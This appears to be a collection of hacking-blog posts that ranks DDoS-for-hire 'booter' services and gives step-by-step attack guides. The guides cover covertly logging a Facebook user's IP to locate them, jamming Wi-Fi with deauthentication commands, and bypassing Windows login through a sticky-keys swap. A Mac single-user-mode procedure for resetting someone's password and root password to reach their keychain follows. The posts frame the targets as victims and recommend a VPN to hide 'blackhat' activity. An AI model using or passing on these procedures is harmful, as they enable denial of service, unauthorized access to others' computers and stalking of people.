Friday, April 1, 2016

TOP 10 STRESSERS-BOOTERS-DDOSERS

DDoS stands for distributed denial of service. An IP Stresser is one of the main causes of DDoS on the internet. It is an attack commonly used by “hackers” as a means of intimidating or cause loss of income. DDoS involves sending little bit of information rapidly until the targeted machine cannot handle anymore. The easiest way to explain it is to try and fit 10 fat men through a doorway of a store at once. It simple stops any other would be customers from entering or leaving. The same goes for your internet connection, DDoS makes it so nothing else can pass through the end result is you have no connection to the internet.
Is DDoS illegal?
Yes and no,  the only law that could even be considered in court against DDoS is sketchy at best. The law in question is the Computer Fraud and Abuse Act . It could be argued in court easily although few have been indicted. Currently an ip stresser falls in a grey area of the law.
How does someone DDoS with an IP Stresser?
In the past there were few ways to DDoS, either you had a botnet or you hacked into servers and uploaded shells which are basically just a webpage that was used to send attacks without the webservers knowledge. However ip stresser shells have now been replaced with purchased servers from data centers that turn a blind eye to what the servers are being used for. An ip stresser is pretty straight forward to use. The ip stresser market has simplified their sites so even the most basic user can try it out. Nowadays that’s what your gonna be using when you use a ip stresser or booter.
What’s the difference between a booter a ip stresser a botnet and a ddoser?
Absolutely nothing, when someone calls a booter an ip stresser they’re basically covering their own ass. An “IP Stresser” is technically more legal than a “Booter” or “DDoser”. When you buy a booter or an ip stresser you imply it’s used for server stress testing which is a legitimate business. So when you see booter,ip stresser,ddoser, they’re all the same thing it’s just preference. However a botnet is a program that is used to infect hundreds or thousands of computers to do their bidding. Sometimes they use them for mine crypto currencies or they offer DDoS for hire services.
Do IP stressers use my IP to DDoS?
No, this whole idea of stressers using your IP came from HOIC and LOIC which basically made you infected with their virus and made you a part of their botnet. IP stressers use servers to send attacks, however some stressers will log you ip address so it’s always a good idea to use a VPN whenever you do anything blackhat.
The VPN i use is: Anonymous VPNs they’re very good and completely anonymous. Which means no logs!
Need DDos protection for your website? Check Out Prontohost! They offer everything from web-hosting to reverse proxies.

The best ip stresser/booters/ddosers on the market!

These have all been personally tested and chosen by multiple people. I personally was tired of weak ip stressers that couldn’t knock down a stick. Luckily i found a few gems hidden away and i decided to make this list so that no one else has to waste money on a bad ip stresser.
#1 – Networkstresser.com (120GB/s of combined power)(Takes down everything)(Working Skype resolver)(Active support)(Multiple payment options)(A lot of tools)
#2 –  Critical-boot.com (100GB/seconds)(Build Your Plan)(API)(Insane Power)(PayPal/Credit cards and 15% off Bitcoin)
#3 – Booterbox.com (Good power) (Easy to use source) (Live chat support)
#4 – Youboot.net (Good Power)(Stop button)(Cheap)
#5 – Polystress.com (Good power)(Live Support)
#6 – Booter.org (Great power)
#7 – Databooter.com (Good power for home connections)
#8 – Ipstresser.com (Good power)(Live chat)
#9 – Iddos.net (Nice booter)
#10 – Coinstresser.com (Old booter)

How to trace Facebook users location using IP address & User-Agent


List of IP grabbing/Tracking Tools

  1. blasze IP logger
    On the website enter any URL like facebook.com or any file URL likeimage.com/image2.jpg and click ‘submit’. You will get some information related to your tracking link. Note down your Access code and copy your tracking link which you will need to send out to the Facebook user whose IP address you want to log. Now go to the main page after sometime and paste your Access code to check if the victim has clicked (Scroll down a bit to see access logs).
  2. Grabify IP logger
    Grabify is very similar to ‘blaze IP logger’ and provides tracking code just like access code above for you to see logs anytime you want. Just goto the website, enter any URL and click ‘Create URL’. Then you will get your tracking link along with stats link or tracking code.
  3. IPlogger.org
    This tool has one unique feature that lets you embed Invisible pictureinto any HTML page or website that will automatically log the IP of visitor with out his knowledge, but Unless you know basic HTML and how to host website online i would recommend not to use it and instead use regular redirect URL method. But again if you can learn ‘How to make static websites’ (you will find loads of tutorials), this is the best tool.
Once you get your tracking link, make sure you use another URL shorter like tinyurl or bit.ly before sending it to Facebook user. This will help mask the tracking URL since all of them have the domain name visible in the link.

Tracing Facebook user location

Now here comes the real pain, You have already done enough reconnaissance against the victim (Facebook user) and now you have the ‘IP address’ of that user. What Next?. There is 90% chance that the IP address you have just found out is of a proxy server or a person from alocation which seems totally unrelated to you. And then there is a anonymous Proxy network called TOR and if in-case the Facebook userwhom you are trying to trace is Using TOR network, then the whole process of tracing his location will yield no fruit.

So, if the user is using proxy or TOR network, the only way to trace him down is to engage with him on Facebook using another fake account and apply ‘social engineering methods to extract information, i will discuss about it next but before that we will just assume that the User is not using any kind of anonymity software and is casually harming you using his computer system or Mobile phone. In this situation its very easy to tracehis location.
In the process of getting IP address, If you used Blasze or Grabify you must have noticed that in the access logs along with IP there is another set of information about USER-Agent. User-agent is nothing but the Computer system which was used by the Facebook user when he clicked the tracking link. Here is the sample USER-agent data:

As you can see above we have two user-agents, the first user-agent is a ‘Windows machine (x64 bit)’ running Windows 8.1 (Windows NT 6.3) and the second one is a ‘Android device’ (Moto G XT-1032) running Android 4.4.4. It also contains information about the Web Browser used by the user. The Android device is using ‘Google Chrome’ while the former used ‘Firefox 38.0’.
Now that you have sufficient information about the Facebook user, you can compare it with any person you doubt. Just make a list of people you know using the said mobile phone or computer system. If you happen to know the person with same device configurations, then you have successfully traced that Facebook users location.
Sometimes you might have doubt on some people behind the fake profile but you have no Idea about what computer system they are using. In this situation, you make a list of people who are possibly behind the fakeprofile and create separate ‘IP tracking’ links for each of them. Now send the links to these people on their real Facebook profile. Be careful about how you send the tracking links, make sure your message is well crafted. I recommend you reading my previous Article for the tips.
Once these people click on their respective tracking links, list down theiruser agents and corresponding IP address. Now compare each of them with the fake Facebook users Information. If there is a match, You Win!. Note that the IP address will or will not match since some internet providers registers users on new IP every time they connect to internet.
Many times you may not find the match that means the people you doubted are either using multiple devices or the culprit is not on your list. In this case we will use IP address look-up tool to trace the location of the Facebook user.
Goto the above website and enter the Facebook users IP address and click ‘search’. Once it traces the IP address, it will show you a list of information that will contain Location, Latitude & Longitude, ISP, Domain (ISP name) and other information which might not be relevant. Important attributes to look-up is the Domain which contains the Internet service provider’s name, Location (sometimes not correct). If you think thelocation is known then just copy the Latitude & Longitude details (Ex:12°58’33″N 77°36’12″E) and paste it in Google to trace the location. But The most important attribute is domain. Once you know the ISP name, go back and match it with all the people you doubted. If any of the person has the same ISP provider, then he might be the possible culprit (IP addresses might not match since ISP provides dynamic IP these days).
In most cases you should be able to find the location of the user. If nothing works and the matter is serious, then please approach police with all your findings and register FIR against the Facebook user who is bothering you . If you have any questions or doubts, feel free to leave comment below

Friday, July 3, 2015

TOP Hacking Tools


1. Nmap- Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
2. Wireshark- Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network.
3. Metasploit Community edition- Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence.
4. Nikto2- Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
5. John the Ripper- John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.
6. ettercap- Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.
7. NexPose Community edition- The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features.
8. Ncat- Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
9. Kismet- Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.
10. w3af- w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.
11. hping- hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
12. burpsuite- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
13. THC-Hydra- A very fast network logon cracker which support many different services.
14. sqlmap- sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
15. webscarab- WebScarab has a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned.

Thursday, May 22, 2014

WIFI Jamming Attack - DeAuth Attack

I am posting this method for Linux but I suppose this will work on Windows too.
FIRST: You will need aircrack-ng. The method of installing it is different for every Linux distribution. In Ubuntu you can install it by issuing following command in terminal window:
sudo apt-get install aircrack-ng

SECOND: After installing it we need to find out if our network adapter is detected by system or not.
Issue following command in terminal window to get a list of detected adapters:
sudo airmon-ng
This will show an output like this:
Zer0C00l@ASUS-PC:~$ sudo airmon-ng
Interface       Chipset                 Driver
wlan0              Intel 965CDX     iwl3965 – [phy0]
It may show other adapters like eth0, eth1 and so on, but we need only wlan0 (e.i. the Wireless Adapter).
THIRD: Now we need to put our Wireless card to monitor mode, issue following command in terminal window:
sudo airmon-ng start wlan0
which will show a message “monitor mode enabled on mon0″, where mon0 is a new interface which we will use for monitoring.
FOURTH: Now we need to find out which networks are available from our location. Make sure you are as close to your desired access point as possible and issue this command in terminal:
sudo airodump-ng mon0
Note down the BSSID (MAC address) of the access point you want to attack.
FIFTH: The final step! Issue following command in terminal:
sudo aireplay-ng -0 0 -a 00:AB:6C:CD:40:70 -c mon0
Where,
-0 is for deAuthentication.
0  (zero) is for continuously sending deAuthentication packets.
-a 00:AB:6C:CD:40:70 is the BSSID of Access Point you want to attack. 
mon0 is the monitor interface we created earlier.
We will get an output like this:
20:10:02  Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:02  Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:03  Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:03  Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]

Wednesday, May 21, 2014

Hack Windows 7 / Windows 8 Password Easily - No Software or CD Needed


  1. First, you will start up the computer (or restart it).
  2. While the computer is coming up and you can see it saying, “Starting Windows,” grab and hold down the power button until it does a hard-shutdown.
  3. This will make Windows have an issue. It will think it is broken and ask you if you want to Launch Repair, or Start Normally. You will choose to Launch Startup Repair.
  4. Start-up repair will boot up and take a little while, then it will ask you if you want to use a System Restore Point. You are going to choose “Cancel.”
  5. Wait until you get a dialogue telling you that Start-up Repair could not repair the computer automatically!  So, you will click on the down arrow in the bottom left so you can see the Problem Details.
  6. Now you will click on the link at the very end of the Detail Report. It is the link for the Privacy Statement.                                                       
  7. Notepad will come up with the Privacy statement in it. You will go on the File menu and go to Open.
  8. Using the Open Dialogue, you will go to “Computer” –> “Local Disk” –> “Windows” –> “System 32, don’t forget to switch from “Text Documents” to “All Files” so you can see every file in this folder.
  9. Rename the file “sethc”  to “sethc-bak
  10. copy and paste the  “cmd” in the same folder. You will now have a file called “cmd – Copy.” You need to rename this to “sethc”. and reboot the PC.
  11. You will now be at the Login prompt (where you don’t know the password). Hit the Shift Key on your keyboard 5 times.
  12. The Command Prompt with Administrator Privileges comes up! You will type in:net user and then make note if your intended victim username. If the username you have at the login screen is not here, then it is probably a mask for one of the ones here on the net user screen. Choose wisely.
  13. To reset the password, type in: net user [username] [password]

Tuesday, May 20, 2014

Asterisk FOP Alternative

Modified Version of Asternic Stat which easily replaces the FOP in Asterisk PBX, it shows only the real time events. It's Easy to install and there's no limitation.

I Modified this tool to show the user extension, DND status, and many other things. this tool is perfect for supervision and if you're searching for tool with view access only.


The Installation Guide is included
Download Link: Click Here
Archive Password is: passtricks.blogspot.com


Break Mac OS Password

you just need to do a bit of fancy command-line footwork to achieve the same end as the CD method. Boot up the computer, holding Command+S as you hear the startup chime. The Mac will boot into single user mode, giving you a command prompt after loading everything up. If the Mac is running Snow Leopard or below, type the following commands, hitting Enter after each one and waiting for the prompt to come up again before running the next one:

/sbin/fsck -fy
 /sbin/mount -uw /
 launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
 dscl . -passwd /Users/User Password

If the Mac is running Lion or above, you'll instead want to use the following commands:

/sbin/fsck -fy
 /sbin/mount -uw /
 launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist
 dscl . -passwd /Users/User Password

Replace User with the user whose account you want to access and Password with the new password you want to assign to that user. If you get an error message about com.apple.DirectoryServicesLocal.plist on a Lion or Mountain Lion machine, just ignore it—the password reset should still work.


If you don't know the user's username, it should be pretty easy to run ls /Users at any time during single user mode to list all the home folders on the Mac, which usually correspond to the usernames available on the Mac. Note that the user's password is different than the root password. If you want access to the more secured parts of their machine—like their password keychain—you can change their root password by running this command after loading opendirectoryd.plist:

passwd root

Once finished, you should have access to most of their system, including their saved passwords for other apps.